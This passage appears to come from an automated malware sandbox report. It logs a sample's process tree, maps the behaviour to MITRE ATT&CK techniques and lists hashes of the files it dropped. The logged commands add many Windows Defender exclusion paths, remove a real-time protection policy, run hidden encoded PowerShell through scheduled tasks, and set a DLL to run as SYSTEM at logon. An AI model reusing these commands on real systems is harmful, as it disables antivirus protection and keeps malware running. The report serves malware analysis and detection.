    PID:3028
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
  2⤵
  PID:2904
- - C:\Windows\SysWOW64\reg.exe
    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1992
- C:\Windows\SysWOW64\cmd.exe
  cmd /C copy nul "C:\Windows\Temp\WfWMfMBmpceHOoPp\MEKWoKDd\qBqaJmvbSMWqImUt.wsf"
  2⤵
  PID:2872
- C:\Windows\SysWOW64\wscript.exe
  wscript "C:\Windows\Temp\WfWMfMBmpceHOoPp\MEKWoKDd\qBqaJmvbSMWqImUt.wsf"
  2⤵
  PID:888
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2264
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:1624
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1512
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2524
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2292
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2628
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2688
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2496
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2820
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WmDfgxqULrgOkJVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:3008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WmDfgxqULrgOkJVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2392
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:2692
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1436
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
    3⤵
    - Windows security bypass
    PID:1644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
    3⤵
    - Windows security bypass
    PID:2672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2360
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1700
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2300
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HyPszsbozHjU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1660
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2168
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YdicROZXU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1568
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:868
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\czlHcasKUAUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1180
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2980
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\sdIWsxsIljAmC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WmDfgxqULrgOkJVB" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1948
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\WmDfgxqULrgOkJVB" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2228
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:784
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\pwHRhheBOrJCKgILh" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1788
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WfWMfMBmpceHOoPp" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:2348
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gtGuHqxYT" /SC once /ST 00:05:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gtGuHqxYT"
  2⤵
  PID:1224
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gtGuHqxYT"
  2⤵
  PID:644
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
  2⤵
  PID:1988
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
    3⤵
    PID:1684
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
  2⤵
  PID:2256
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
    3⤵
    PID:1884
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IHVYqsxcTONNTHrkf"
  2⤵
  PID:2560
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IHVYqsxcTONNTHrkf"
  2⤵
  PID:2576
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "IHVYqsxcTONNTHrkf2"
  2⤵
  PID:2584
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "IHVYqsxcTONNTHrkf2"
  2⤵
  PID:2148
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FHGmkIleNxhXYqnGE"
  2⤵
  PID:2684
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FHGmkIleNxhXYqnGE"
  2⤵
  PID:2524
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "FHGmkIleNxhXYqnGE2"
  2⤵
  PID:2448
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "FHGmkIleNxhXYqnGE2"
  2⤵
  PID:2864
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qAeAPTrMJRoznGvjNRa"
  2⤵
  PID:2508
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qAeAPTrMJRoznGvjNRa"
  2⤵
  PID:2368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "qAeAPTrMJRoznGvjNRa2"
  2⤵
  PID:2824
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "qAeAPTrMJRoznGvjNRa2"
  2⤵
  PID:2172
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uEYSTijKezSiwZHRVZv"
  2⤵
  PID:3008
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uEYSTijKezSiwZHRVZv"
  2⤵
  PID:2692
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "uEYSTijKezSiwZHRVZv2"
  2⤵
  PID:2392
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "uEYSTijKezSiwZHRVZv2"
  2⤵
  PID:1420
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\YdicROZXU\kxJtNo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "NZVNOJbpXMfOcZM" /V1 /F
  2⤵
  - Drops file in Windows directory
  - Creates scheduled task(s)
  PID:908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RfJdocXrRdzqSjl"
  2⤵
  PID:2332
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RfJdocXrRdzqSjl"
  2⤵
  PID:1072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "RfJdocXrRdzqSjl2"
  2⤵
  PID:764
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "RfJdocXrRdzqSjl2"
  2⤵
  PID:1280
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "hyUxRErQvVmnlS"
  2⤵
  PID:2360
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "hyUxRErQvVmnlS"
  2⤵
  PID:2184
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tvNRMRhykyYTT"
  2⤵
  PID:2176
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tvNRMRhykyYTT"
  2⤵
  PID:1652
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "tvNRMRhykyYTT2"
  2⤵
  PID:2644
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "tvNRMRhykyYTT2"
  2⤵
  PID:2412
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "NZVNOJbpXMfOcZM2" /F /xml "C:\Program Files (x86)\YdicROZXU\fUGMtzw.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2500
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "NZVNOJbpXMfOcZM"
  2⤵
  PID:2100
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "NZVNOJbpXMfOcZM"
  2⤵
  PID:2368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lwldEwWqrgILqr" /F /xml "C:\Program Files (x86)\HyPszsbozHjU2\fhScxsV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:1632
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "AAxajbpKnHWKP2" /F /xml "C:\ProgramData\WmDfgxqULrgOkJVB\iRmYamt.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2956
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FHGmkIleNxhXYqnGE2" /F /xml "C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\uhmHXEV.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2444
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "uEYSTijKezSiwZHRVZv2" /F /xml "C:\Program Files (x86)\sdIWsxsIljAmC\vuPVdzl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2144
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 2612 -s 268
  2⤵
  - Program crash
  PID:1280

C:\Windows\system32\taskeng.exe
taskeng.exe {A8103DEB-FCB2-43C9-8F9E-9CA47C2156CB} S-1-5-21-330940541-141609230-1670313778-1000:KXIPPCKF\Admin:Interactive:[1]
1⤵
PID:880
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1072
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:784
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1532
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:1736

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2444

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:940

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2028

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:1144

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\FXcAieiFOJUrqqKhXGR\uhmHXEV.xml

Filesize
2KB

MD5
ec2c152992c356672d0dfdb5eb6367c1

SHA1
262603be3e9b30803b6c087c6a5fd236ac16a080

SHA256
ad13c41b6fbaceb0a9c19880a9cd37dd6f263a03dcf8a1ef2feb543e6d97a23b

SHA512
648bc68992573668b575ca6608b6a59be34fd616446c2d957723b64e7aecfd0e1f271afb71900d5db5b664140454c061943d404e07e373a796929684fa40eb23

Download Submit
C:\Program Files (x86)\HyPszsbozHjU2\fhScxsV.xml

Filesize
2KB

MD5
23f02f09f520e41f8c02143a4c74553d

SHA1
4f40db29139925d6b7e47e3bcc93de057787b182

SHA256
469a9053e159823dafefc4ea453e6d7774b748b793a948339051df1ddc25b5e6

SHA512
8fe6ea5a35cb7bb91296d569d1ea4eed0932e94bdbfd7123feb895cfbea072e16f84e5056cc1505c7c8221ec6db4a4c2ea87a8d0b486fed52aaa8a952e69bf51

Download Submit
C:\Program Files (x86)\YdicROZXU\fUGMtzw.xml

Filesize
2KB

MD5
2246c0be5a81a8b274e6d89e3e8f762c

SHA1
ee826f4df41fd94922fc65fc622d8d582465a97a

SHA256
3b808f10be0c59700321ceb62304644dff0ecb248eb00af0736fa172a4d81efb

SHA512
564b30c2f64af5f4b1f6f6f0ab0504a0f7debe05a1662529627aea72238d23ade8400126b9b49fb08c346d5404432c6cc0aab513b04f64f5f02e0f2dae59e19f

Download Submit
C:\Program Files (x86)\sdIWsxsIljAmC\vuPVdzl.xml

Filesize
2KB

MD5
c3577a856c5b043e5365e1f01eb21f66

SHA1
98d388090d9b31d29b49eb63fe1f72d47000fd0f

SHA256
fa52fc67bb5daa2233f913e6608d38a5bab44ac92507a0b8f557c2b6bd5bbbf7

SHA512
0fa62295b256af11e3374e9f6af38f1d847872515568bbb5aca93071f4caf0482c1ab3a9f90bd3cce959c9c561a3f23824cc1a4dbf3c1ebcb01a660f6715f757

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{EF7EF554-D23D-4BD5-A178-25C4A3726B49}.xpi

Filesize
640KB

MD5
0c8bd9b2ea23c5e9d5dd20fa562a519d

SHA1
5f09bfb930b8fa4d1df26a677eb52908a32a68ce

SHA256
21ad17d81ca862eda8851942046e165f686b43f1379215283e37ba9ac00bb91c

SHA512
47bff1e398928c73f90b0844c04ab438e68f183a9160f61e2e0014cb12e662db00630aaf3c3a3d546bbfd175c79fc6defbb0cd51fc50aec0541ec41907f10806

Download Submit
C:\ProgramData\WmDfgxqULrgOkJVB\iRmYamt.xml

Filesize
2KB

MD5
e4a9baa6f41d2753204f734132ffe39f

SHA1
0df4b4041a0e4061029399263afa4c7f4a366c91

SHA256
98a69804d77662eceb2279ff511de9d9d38c350f8d542ee2acaae114a23cda7e

SHA512
b76a0700d0e42b678062b13843123f731809a66bc093af760388936e5a3d06b026b8cb9f34f2220ad3bed96b4e376ba4d00d2d4f54c79c36a3ee8a5fbe0cc458

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\_locales\en\messages.json

Filesize
150B

MD5
33292c7c04ba45e9630bb3d6c5cabf74

SHA1
3482eb8038f429ad76340d3b0d6eea6db74e31bd

SHA256
9bb88ea0dcd22868737f42a3adbda7bf773b1ea07ee9f4c33d7a32ee1d902249

SHA512
2439a27828d05bddec6d9c1ec0e23fc9ebb3df75669b90dbe0f46ca05d996f857e6fbc7c895401fecfae32af59a7d4680f83edca26f8f51ca6c00ef76e591754

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\fnknkapchbklfgbfimfgcapmdnlkdajg\1.2_0\_locales\pt_BR\messages.json

Filesize
161B

MD5
5c5a1426ff0c1128c1c6b8bc20ca29ac

SHA1
0e3540b647b488225c9967ff97afc66319102ccd

SHA256
5e206dd2dad597ac1d7fe5a94ff8a1a75f189d1fe41c8144df44e3093a46b839

SHA512
1f61809a42b7f34a3c7d40b28aa4b4979ae94b52211b8f08362c54bbb64752fa1b9cc0c6d69e7dab7e5c49200fb253f0cff59a64d98b23c0b24d7e024cee43c4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\21ISJGVAMRSH2MLO2F3D.temp

Filesize
7KB

MD5
78c69e5cfee8f30a10a32418bf2cfa32

SHA1
55bd6a9bdfe4beacdc81fd987e38b0b90e6c76d6

SHA256
bca08e3b0a7dac2d6e4bf47b316384ba959b3de3e309e55a791e31ae1d79e4cc

SHA512
4c34db9ad8c09036ee16ece29895e2e39343d4c5b2d53acc00cbe04a9e35ddaa0cfeda252cc41c287179418db2226d4887808d8ca5c475caf4175925226e6596

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
c4bafb77ebab8c6226131b18e0cbe05a

SHA1
54c08852681e49c9fc0f8b9cc412869380504d7a

SHA256
ff76e00852b14c595f41ca599948f8930a82cd9670cf35e52f77ccb018cdc405

SHA512
20f23a5959093389142578291bc90a8e32a6a659eebbc51f9e2a9345327506844673a2ef7e56876870a74c36853456b868bd42accbbabe90f045cd68c44c4945

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6RANIOGVRHK1J2DIA1KP.temp

Filesize
7KB

MD5
4e1d543f4d047183e0689a60488ca259

SHA1
9d54aca6efb9c1bf2426f5417f3992795b4277fb

SHA256
a7b09f96500fbda654e6888d138917980fa788d7d68bc73f5df4e7605e058a2d

SHA512
b6815c0549dcc63738b8ac33706df5f851f48ef02285d682be3f65846f7a71821db7a01a0c92e1deba2a00816a75100a441c45bc048f9b5665554c8d7815732b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
8701788e6ebb73310d2edc5d7ff1a750

SHA1
8e49a04b6fa13607ec7b478b5e4dd436587fb330

SHA256
7afac9ecaef3a8ef9a1fc0e1580b4ccca7dc6b90c764a9e35ae2147d6461137f

SHA512
bb986cbf2cfe07487cc69a63d03a91bbdcb774cb373ecb3ba60f08e0a751d05d37febff5833742daf3ecdadd0d876b6e244d5273e3ebf077f1c4b27d0737a7f7

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\prefs.js

Filesize
6KB

MD5
89aec0e2d1a1f75c2a36800743302ded

SHA1
c084c383f350b4cbde163e7c336ca33351ef0e98

SHA256
3c5079314f0a7d5d4f79c0a5e039ff8d50d9032d5ad995205659e527ba887be7

SHA512
16465672ea62f0b033a7b91692dda2919b29963ffb892b272a403a3490de2defd1e4a7ded1aa8e6f31810456a676fd8579a7057ed4427dc847f40e9ce6cc18bf

Download Submit
C:\Windows\Temp\WfWMfMBmpceHOoPp\MEKWoKDd\qBqaJmvbSMWqImUt.wsf

Filesize
9KB

MD5
8127c53df42f7b461c4a2d07e306206a

SHA1
c57d024171f039449393bd7f1d0a248fb6690bff

SHA256
9a9bb134fac8539ae7a9250c32c003ca433d3c4c58a13ec4ff29571a80735a3b

SHA512
